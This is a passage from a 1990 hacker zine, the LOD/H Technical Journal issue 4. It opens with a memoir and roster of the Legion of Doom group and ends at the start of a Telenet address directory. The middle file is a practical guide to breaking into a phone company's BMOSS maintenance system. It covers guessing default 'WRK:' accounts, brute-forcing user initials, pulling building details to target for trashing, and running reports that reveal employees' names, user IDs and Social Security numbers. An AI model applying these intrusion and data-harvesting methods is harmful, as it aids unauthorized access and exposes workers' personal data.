the ideal is there. Whenever a group of individuals get together, you cannot
forget that they are individuals. These individuals can and do make mistakes
in judgement in some cases. But also, they have been and continue to be
victimized by law enforcement and said others. Over the years I have collected
tens of newspaper and magazine articles about "The LOD", myself, and others
with not a one being perfectly accurate. You have heard it before: don't
believe everything you read. That goes for this article also, although I have
made an honest attempt at ensuring that it is truthful and accurate, as Ripley
said: believe it, or not.
I have been "retired" for quite some time now. My definition of retired is
simply that of keeping my activities to those of a strictly legitimate nature.
It is quite funny yet pitiful to here people say, "once a crook always a
crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done
something wrong when they were young yet many grow up to become the so called
normal, law abiding citizens that society says we should be. At this point in
time and in the foreseeable future, the risks of exploring and learning about
telephone and computer networks in a less than legitimate fashion outweigh the
benefits. I think many of the older hackers have adopted this philosophy out
of necessity. This decision is even easier after reflecting on the events of
which I have seen during the course of my "career". Those events are primarily
those of seeing people's rights being violated by law enforcement. Their
privacy being forsaken by the media. I do not dispute however, that some
hackers have done these same things to other hackers and other people. Neither
side is right or fair so I suppose it is time to exit since it's getting too
hot in the kitchen. I will remain however, in an advisory capacity to the
Technical Journal and group for as long as they continue exist. If you are to
believe the rumors, LOD has been dead many times, again untrue. The main
drawback of becoming a BBS hermit is how the rumors start to accrue as time
progresses. I have been "busted" perhaps a hundred times if you believe every
rumor. The fact is that I have never been visited let alone busted. I have
seen many people get into trouble due to their own carelessness. Those who
have remained unmolested by the authorities are either very careful and
paranoid, or are helping them catch others. I have been extremely careful and
exceedingly paranoid, period.
Now that I have harassed the reader with my comments regarding the whole
hacking/phreaking experience, I present the story. Please note that I realize
many people could care less about all this, and if you are in that category
you can always throw this into the shredder, now. But, there is a sufficient
number of people who actually are curious to get the real story on this stuff
so here it is, presented to correct the many inaccuracies which have surfaced
over the years and also for the sake of posterity.
_____________________________________________________________________________
During the winter break from school in late 1983, I took a trip up to Long
Island, NY to visit Quasi Moto. I had met him in south Florida, and he had
since moved. He decided to put up a BBS, and while visiting him, we worked on
it. For those who do not remember, its name was PLOVERNET. PLOVERNET was
considered a resurrected OSUNY by some since some users migrated to PLOVERNET
after OSUNY went down, at least in part, by an article in Newsweek mentioning
it. A new hacker magazine, 2600, started posting advertisements on various
boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on
Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to
the large amount of users, (500, of which 70% were relatively active) 2600 had
plenty of response. PLOVERNET went online in January of 1984 and shortly
thereafter it was the busiest BBS around. It was so busy in fact, that a long
distance service called LDX had stopped connecting people who dialed
516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984
here. The practice of blocking calls to a certain number wasn't really done
by common carriers until 1986/87 with the emergence of new security software
and audit trail information. I picked the best phreaks and hackers from
PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the
first boards which upon connection did nothing until you entered the primary
password, and there was no new user routine as the board was invitation only.
Again, this was back in early 1984. It was a fairly original albeit paranoid
practice at the time, and many boards subsequently adopted the technique as
security became an increasing concern.
Various groups had started forming such as Fargo 4A and Knights of Shadow.
I was admitted into Knights of Shadow in early 84. After suggesting some
promising new phreaks/hacks for membership and being turned down because they
were not well known enough, (ie: they weren't big names even though they knew
more than the guys who supposedly were) I put up the Legion Of Doom! bulletin
board and shortly thereafter started a phreak/hack group of the same name.
This was about May of 84 from what my records show. I had been a member of
KOS and LOD or a brief time and then KOS broke up. Although there were many
users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction
seems to have been forgotten by many, since some who were on the BBS have
claimed to have been in the group, which is not true.
The name Legion Of Doom! obviously came from the cartoon series which
pitted them against The Superfriends. I suppose other group names have
come from stranger sources. My handle, Lex Luthor was taken from the
movie Superman I. In the cartoon series, LOD is led by Lex Luthor and
thus, the group name was rather fitting. Being young and naive, I thought
having a handle of someone who claimed to have 'the greatest criminal mind on
Earth' and leading a group of the world's most notorious criminals would be
cool. That was about 7-8 years ago. Now however, I see that there is nothing
cool or attractive about being a criminal (believe it, or not).
The original group consisted of phreaks who I had thought were very good
but were not considered 'famous' like those in KOS. Those original members
later became some of the best known phreak personalities and contributed
substantially to the knowledge of new and old phreaks alike. A list of members
from the very beginning to the present follows. Through my records and from
the best of my recollection I have approximated dates of entrance and exit and
other information. Also, I believe I have a complete list however, there
could be a mistake or two. Very few if any, handles from the past have been
duplicated by 'impostors' whether knowingly or unknowingly.
I look at this article as a historical document seeing how no other group
has survived as long as LOD has. LOD originally consisted mainly of phreaks,
but had split into two separate entities. LOD for telecommunications
hobbyists, and LOH for hacking and security enthusiasts.
Handle Entered Exit Location Reason for leaving
-----------------------------------------------------------------------------
Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER---
Karl Marx early 84 late 85 Colorado Went underground/quit.
Mark Tabas early 84 late 85 Colorado Many reasons.
Agrajag The Prolonged early 84 late 85 California Loss of interest.
King Blotto early 84 late 85 Ohio No time/college.
Blue Archer early 84 Fall 87 Texas College.
The Dragyn early 84 late 86 Minnesota No time/lost interest.
Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud.
Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS.
Doctor Who late 84 early 86 Mass. Misc. Trouble
Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER---
Sir Francis Drake late 84 early 86 California ???
Paul Muad'dib late 84 early 86 New York Went underground/quit.
Phucked Agent 04 late 84 late 87 California No time. School.
X-man late 84 mid 85 New York Busted- Blue boxing.
Randy Smith late 84 mid 85 Texas ???
Steve Dahl early 85 early 86 Illinois Busted-Carding.
The Warlock early 85 early 86 Florida Lost interest.
Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking
Silver Spy late 86 Fall 87 Mass. College.
The Videosmith early 86 Fall 87 Penn. Lost interest.
Kerrang Khan early 86 Fall 87 U.K. ???
The Marauder early 86 mid 88 Conn. Lost interest.
Gary Seven early 86 mid 88 Florida Lost interest.
Bill From RNOC early 87 late 87 New York Misc. Trouble.
Carrier Culprit mid 87 mid 88 Penn. Lost interest.
Master of Impact mid 87 mid 88 California School.
The Leftist mid 87 Sum 89 Georgia Misc. Trouble.
Phantom Phreaker mid 87 Fall 89 Here/There Lost interest.
Doom Prophet mid 87 Fall 89 Here/There Lost interest.
Thomas Covenant early 88 early 89 New York Misc. Trouble.
The Mentor mid 88 Sum 89 Here/There Lost interest.
The Urvile mid 88 Sum 89 Georgia Misc. Trouble.
Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER---
Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER---
The Prophet late 88 Sum 89 Georgia Misc. Trouble.
Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER----
Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER---
Directory key:
"Lost Interest": simply means they lost interest in phreaking/hacking in
general, not lost interest in LOD/H.
"???": reason for leaving is unknown.
Misc. Trouble: Exactly that. Too much to go into here.
Of all 38 members, only one was forcefully ejected. It was found out that
Terminal Man destroyed data that was not related to covering his tracks. This
has always been unacceptable to us, regardless of what the media and law
enforcement tries to get you to think.
Remember, people's entrance/exit times have been estimated.
[ End of Article ]
The LOD/H Technical Journal, Issue #4: File 07 of 10
The Trasher's Handbook to B.M.O.S.S.
by
Spherical Aberration
INTRODUCTION:
Those who have actually trashed at Bell Co. before know that finding an
installation can be a pain. Most Telco buildings these days are un-marked,
plain, and generally overlooked by the average person. The buildings
were specifically made so that they WOULD be overlooked, concealing
itself and its contents. Knowing where all Bell Co. installations are
would be nice, and through the help of BMOSS we can find out where they
ALL are.
NOTE: It is possible to get locations from your city hall, just take a
look at what property Bell Co. owns and locate it. However, there are few
catches to this method. First, most cities charge you to find out who
owns what property and there might be a waiting period of a few days.
Second, not all Bell Co. property is owned by Bell Co. There are
instances of Bell Co. renting a piece of property from a company and
using the existing building, possibly with the leasing companies logo
still on it.
BMOSS stands for Building Maintenance Operations Service System.
BMOSS provides computer support for daily building maintenance tasks.
A comprehensive database helps users keep track of repair activities.
Telco field mechanics logon everyday to do assorted field mechanic
stuff. From BMOSS they can check on tasks needed to be done, send
messages to users, charge various Telco installations for work, log time
sheets, generate purchase orders, see where his buddies are eating lunch etc.
BMOSSes are usually located in a BOCC (Building Operations Control
Center) or in a REOC (Real Estate Operations Center). BMOSS is run
under AT&T Unix System V and at some points is quite Unix-like. At each
center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of
operations for that center and other installations supported by that
BOCC/REOC.
LOGGING ONTO BMOSS:
Before logging on to BMOSS you must select the proper type of
terminal emulation. BMOSS has 4 types of emulations available for all
users. Users within the BOCC/REOC use either VT100 or VT220 compatible
terminals, while other internal stations will use an LA120 printer
terminal. Field Mechanics at a remote location use their typewriter
like LA12 printer terminals.
Identifying a BMOSS dialup is not that hard at all. After hitting a
three [CR]'s the system will respond with something like this:
(BEEP!)
Good Morning (Depending on what time of day it is)
BASE/OE - Fri 04/23/90 09:43:22 - Online 9
User ID?
Password?
Typically user IDs are the three initials of the field mechanics name.
After inputting your ID you will be prompted with a Password? request.
Passwords can be from 6 to 8 characters in length, including punctuation
marks, the first letter must begin with an alphabet-letter or a number.
They cannot contain spaces or the users first/middle/last name.
Periodically the system will prompt the user for a new password. This
period of time is usually set by the system administrator.
I have found that the "WRK:A10" user ID or a variation of WRK:xxx
where xxx is a alpha-numerical combination has worked excellent for me.
I believe the WRK:xxx is some type of low-level account when field
mechanics lose their current ID/PW combination. Initials also have been
found on most of the systems, so a WRK:xxx and Initials brute-force attempt
just may give you a working ID.
IN BMOSS:
Once penetrating initial security you are then prompted with BMOSS's
FLD> main level identifier. This FLD> changes as you move from BMOSS's
root to the various main BMOSS branches.
Sometimes when you logon to BMOSS you will receive a memo saying,
"NOTE - Check your office" at this time go to the Office and read the memos
sent to you. Read THE OFFICE later in this article to learn how.
BMOSS was designed with the average Joe in mind and is very logically
laid out. BMOSS was modeled after UNIX's Tree-oriented structure.
Here is a Tree of BMOSS's structure:
BMOSS
_____________|_____________
| | | | | |
CON DAT ACT FOR BIL OFF
Main Branches:
CON- Control Functions (Sys Admin payroll/timesheet functions)
DAT- Database Maintenance (What we are mainly concerned with)
ACT- Field Activity (Handles field activities)
FOR- Force Administration (Recording labor hrs for time sheets etc.)
BIL- Bill Paying (Processing purchase orders, producing expense accts.)
OFF- Electronic Office (Receive/Send Messages or Page users)
Each main branch then branches off into its own specific
commands. I will concentrate on the Database Maintenance functions since
the other functions have little or no use to us.
DATABASE MAINTENANCE:
To haul in the mother lode you go into the Database Maintenance area
from the root. This is accomplished by typing DAT in at the FLD>
prompt. Now you should get a DAT> prompt meaning you are now in the
Database Maintenance section. To get a listing of the available DAT
commands type in 'SHO' which is short for SHOW. We are mainly concerned
with the BLD (Building Master) function. Once the BLD function is
selected you will be prompted for a sub-form. There are 7 sub-forms for
the BLD function.
BLD Sub-Forms:
1. GEN- General Background
2. OWN- Building Ownership (used for adding a new building to database)
3. LES- Lease Terms (used for adding a new building to database)
4. EMG- Emergency Data (contains Police and Fire Dept. that serve this
location and their respective telephone numbers, and whether the
location has backup power and fire-sprinklers etc.)
5. RES- Maintenance Responsibility (Maintenance entries for building)
6. WRD- Building Warden (Building Wardens number etc.)
7. NOT- General Notes (Notes about the particular building)
8. ACC- Accounting Distribution (Account for particular building)
Accessing the above information is as easy as selection of the three
letter identifier at the Sub-Form prompt. We are particularly concerned
with the GEN (General Background) information. This function gives us the
following data:
1. Building's Number
2. Building's Complete Address
3. Building's Name
4. Building's Sector (Bell informational purposes only)
5. Building's Zone (Bell informational purposes only)
6. Whether or not Bell owns the building. (A Y/N combination is usually
shown here. Y meaning its is owned by Bellco, N meaning its not
owned by Bellco.)
7. The building's group (One letter identifier)
8. The building's use. (Garage/Warehouse/Office etc.)
9. The kind of telephone equipment used in the building. (ESS1A etc.)
10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier)
11. The number of floors in the building
12. The number of basements in the building (A number of 3 here would
mean the building has 3 below ground level floors.
13. Whether or not the building has a cable vault. (Y/N identifier)
14. Gross Square footage of the building
15. The number of reserved parking spaces for the building.
Once entering the DAT section and entering GEN as your sub-form
selection you will be prompted for a building number. Random selection
of building numbers is necessary because they vary from area to area.
Once a legitimate building number is accessed the above information will
be displayed.
Ok, you now have the information you need, how do you get back to a
previous directory or even log off ? That's quite easy. Typing in EXI
(short for EXIT) will bring you back up to the root FLD> one directory at
a time. For logging off the system you should hit EXI until you reach the
FLD> root then BYE and you will get:
BASE/OE - Fri 4/23/90 10:22:13 - Offline 9
Have a Good Morning
OTHER FUNCTIONS:
I have found the REPORTS function most helpful in finding other
user IDs. To get a listing of the 20+ different types reports type
'HELP REPORT' at the FLD> prompt. We are particularly concerned with
REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by
typing from the FLD:
FLD> REPORT 41 04/02/90-04/06/90 <cr>
You are inquiring for the estimated vs. actual hours time on a series
of jobs from April 4th 1990 through April 6th 1990. The output then
kicks out the hours and such. Every field mechanic that worked throughout
those days will be displayed in- First name, Middle Initial, and Last Name
totally spelled out for you.
Another useful report is REPORT 90- Data Access Log. It is called up
by typing:
FLD> REPORT 90 <cr>
Date Range? 04/06/90-04/08/90
The system then kicks out all users that used the SCOPE command on
other users. The system prints out the users full name and actual USER ID
and who the user scoped including the scoped-user's Social Security number.
THE OFFICE:
When you are prompted that you should check your messages you should
do so immediately before any work is done in BMOSS. First you must go to
your office which is done by selecting OFF from the FLD> identifier.
Once this is done your FLD> prompt will change to a OFF> prompt. Typing
HELP will give you the available HELP commands for the office.
To check the messages type in:
OFF> STATUS <cr>
BMOSS will reply with the following: (example)
Memo From User Subject Status
-------------- ------------------ ---------------------- ---
IPAAA 04/01/90 Wile E Coyote Current Task Info OUT
BNAAA 04/02/90 Susie B Hott Last Saturday Night IN
The user then sees he has a memo from his boss about his current
tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his
boss, he wants to read what Susie has to say. So you type in:
OFF> PRINT BNAAA <cr>
--- MEMO ---
Date: 04/02/90
Time: 08:11
From: Susie B Hott
To: Legion Of Doom
Subject: Last Saturday Night
LOD, I really enjoyed last saturday night. We must do it again.
Give me a call soon, 555-WETT.
** Susie
A useful command is a list of OFFICE users. This gives you another
listing of user's Full-Name/ID combinations. Get this by typing:
OFF> USERS <cr>
It will then print out the users who are in the Electronic Office
database.
CONCLUSION:
You can get HELP from anywhere just by typing HELP from the prompt.
Or if you need specific information about a function type in HELP then
the function name. Such as:
FLD> HELP REPORT (This gives you options/help on the REPORT command)
BMOSS can be used for a large amount of purposes for the
hacker/trasher. Even though it doesn't have any really powerful
commands to self-destruct the telephone company it can be used to access
other building's trash, and other things that may interest you.
______________________
( Spherical Aberration )
The LOD/H Technical Journal, Issue #4: File #08 of 10
The Legion Of Hackers Present:
Updated: Telenet Directory
Part A: Addresses 201XXX to 424XXX
Revision #5 Last Updated: 2/10/90
(Includes Mnemonic Host Names)
Scanned and Written by:
Erik Bloodaxe
INTRODUCTION:
-------------
It has been some time since our last update. Our old list (Revision #4) has
been distributed to those in the United States and internationally thanks to
the widespread use of the PSS network. For this reason we are including the
format for converting this 'local' address list into accessible hosts using
the standard scheme for telenet when accessed from 'foreign' networks.
For example, the local address: 20114 is 031102010001400 using the standard
format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet
and the zero preceding it is needed to make it clear to the foreign
network that the NUA (Network User Address) is a non-local address. Another
example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA
00 XXX YY NPA is the area-code prefix (this is not necessarily an area code),
XXX is the sub-address and YY is the port which is usually 00.
For those unfamiliar with Telenet addressing, it generally follows the format
of grouping hosts into area codes. Thus, our directory is grouped accordingly.
There are 'non-standard' address prefixes which are rather obscure. These
commonly are owned by the same company or organization, whereas the area code
format contains hosts from many companies or organizations. The state an area
code resides is also listed to give you an idea of its location.
I have also included Telenet commands, mnemonic addresses, a somewhat current
list of pc-pursuit dialers, and a few things to consider for the would-be
Telenet scanner.
NOTES:
When accessing telenet from abroad, ignore the '